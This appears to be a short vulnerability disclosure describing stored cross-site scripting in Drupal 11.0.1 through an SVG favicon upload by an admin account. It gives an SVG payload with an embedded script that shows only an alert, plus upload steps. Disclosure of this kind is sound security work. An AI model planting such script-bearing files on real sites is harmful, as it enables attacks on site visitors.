Drupal 11.0.1: Malicious File Upload (XSS in SVG)
Description:
# An Issue is discovered in Drupal 11.0.1
# We have identified a vulnerability that allows an authenticated admin account to upload a SVG file containing malicious javascript code (Stored Cross-Site Scripting) into the target system. If the file is accessed through the website, it could lead to a Cross-Site Scripting (XSS) attack or execute arbitrary code via a crafted javascript to the target.
Affected Component:
http://[ip]/en/admin/appearance/settings
Payload:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('Grim The Ripper Team by SOSECURE Thailand');
</script>
</svg>
First, log in to the target web application using an admin account.
Next, click on the “Appearance” panel, and then click on “Settings” tab.
After that, scroll down to the Favicon section, and click on “Choose File” to upload a malicious file.
Subsequently, select the “GrimtheRipperTeam.svg” file to upload to the web application.
And click on the “Save configuration” button to complete the upload.
Finally, we can see the path where the SVG file is located, and we will open it to check the execution of the malicious command in the file.
After accessing the path, we found that the malicious command is working.
Author:
Grim The Ripper Team by SOSECURE Thailand.